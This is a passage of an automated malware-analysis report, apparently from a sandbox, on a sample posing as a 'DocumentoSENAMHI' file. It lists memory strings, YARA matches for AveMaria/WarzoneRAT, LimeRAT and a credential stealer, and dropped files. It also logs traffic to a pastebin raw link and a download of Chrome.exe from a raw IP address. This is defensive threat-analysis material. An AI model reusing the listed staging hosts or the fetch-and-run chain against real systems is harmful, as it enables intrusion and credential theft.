Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 
00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 
00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 
00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 
00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83518448531.00000000062A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81035851437.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81037127774.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 
00000001.00000003.81032367685.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown DNS traffic detected: queries for: pastebin.com
Source: global traffic HTTP traffic detected: GET /raw/03PEm7js HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Chrome.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.111.242.20Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 172.111.242.20

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: GetRawInputData
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: 01 00 00 00

System Summary

Source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
